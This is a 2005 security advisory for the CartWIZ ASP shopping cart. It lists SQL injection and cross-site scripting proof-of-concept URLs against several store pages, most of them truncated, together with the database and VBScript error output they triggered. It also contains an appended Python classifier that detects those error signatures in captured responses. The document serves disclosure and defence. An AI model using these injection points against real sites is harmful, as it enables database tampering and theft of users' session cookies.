Severity: High
Title: Multiple SQL injection and XSS in CartWIZ ASP Cart
Date: 23/04/2005
Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com
Proof of Concept Exploits:

http://localhost/cartWiz/store/addToCart.a...TION&quantity=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL_INJECTION'.
/cartWiz/store/addToCart.asp, line 86

http://localhost/cartwiz/store/productDeta...SQL%20INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL INJECTION'.
/cartwiz/store/productDetails.asp, line 34

http://localhost/cartwiz/store/searchResul...riceTo='SQL INJECTION&validate=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.
/cartwiz/store/searchResults.asp, line 102

http://localhost/cartwiz/store/searchResul...ceFrom='SQL INJECTION&priceTo=9999999999&validate=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.
/cartwiz/store/searchResults.asp, line 102

http://localhost/cartwiz/store/searchResul...tegory='SQL INJECTION&sku=&priceFrom=0&priceTo=9999999999&validate=1
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' or products.briefDescription LIKE '.
/cartwiz/store/searchResults.asp, line 102

http://localhost/cartwiz/store/tellAFriend...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/addToWishli...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/access.asp?...</script>
XSS Pops Cookie

http://localhost/cartWiz/store/error.asp?m...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/login.asp?m...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/login.asp?m...t>&redirect=
XSS Pops Cookie

http://localhost/cartwiz/store/searchResul...9999&validate=1
XSS Pops Cookie

http://localhost/cartwiz/store/searchResul...9999&validate=1
XSS Pops Cookie

http://localhost/cartwiz/store/productCata...tegory='SQL ERROR
SQL ERROR
Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "'SQL ERROR"]'
/cartwiz/store/productCatalogSubCats.asp, line 87
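As an added triage example (not part of the advisory or of CartWIZ): a Python classifier that recognises the error pages quoted above by their ODBC '80040e14' and VBScript '800a000d' signatures in captured HTTP response bodies, extracts the ASP script and line the server disclosed, and groups findings per page, so a defender reviewing proxy captures or scanner output can see which scripts leak database errors. The sample responses are constructed from the advisory's error text; the function and class names are my own.

```python
import re
from typing import Dict, NamedTuple, Optional, Set

# Signatures taken verbatim from the error pages quoted in the advisory.
ODBC_ERROR = re.compile(r"OLE DB Provider for ODBC Drivers error '80040e14'")
SQL_DETAIL = re.compile(r"\[SQL Server\](Unclosed quotation mark[^\n]*|Line \d+: Incorrect syntax near [^\n]*)")
VBS_MISMATCH = re.compile(r"VBScript runtime error '800a000d'")
ASP_LOCATION = re.compile(r"(/[\w./]+\.asp), line (\d+)")

class Finding(NamedTuple):
    kind: str    # "sql-error-disclosure" or "vbscript-type-mismatch"
    path: str    # ASP script named in the error page
    line: int    # source line the server reported
    detail: str  # SQL Server message, if any

def classify_response(body: str) -> Optional[Finding]:
    """Classify one response body; None means it is not a recognised error page."""
    loc = ASP_LOCATION.search(body)
    if not loc:
        return None
    path, line = loc.group(1), int(loc.group(2))
    if ODBC_ERROR.search(body):
        m = SQL_DETAIL.search(body)
        return Finding("sql-error-disclosure", path, line, m.group(1) if m else "")
    if VBS_MISMATCH.search(body):
        return Finding("vbscript-type-mismatch", path, line, "")
    return None

def triage(bodies) -> Dict[str, Set[str]]:
    """Group findings by ASP page so each affected script is listed once."""
    by_path: Dict[str, Set[str]] = {}
    for body in bodies:
        f = classify_response(body)
        if f:
            by_path.setdefault(f.path, set()).add(f.kind)
    return by_path

# Constructed sample responses, built from the error text in the advisory.
SAMPLE_RESPONSES = [
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark "
    "before the character string 'SQL_INJECTION'.\n/cartWiz/store/addToCart.asp, line 86\n",
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.\n"
    "/cartwiz/store/searchResults.asp, line 102\n",
    "Microsoft VBScript runtime error '800a000d'\nType mismatch: '[string: \"'SQL ERROR\"]'\n"
    "/cartwiz/store/productCatalogSubCats.asp, line 87\n",
    "<html><body>Thanks for your order</body></html>",  # normal page, no finding
]
```

Run `triage(SAMPLE_RESPONSES)` to get the per-script summary; the same classifier can be applied to bodies read from a proxy capture.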
Author:
These vulnerabilities have been found and released by Diabolic Crab
Source: http://seclists.org/lists/bugtraq/2005/Apr/0385.html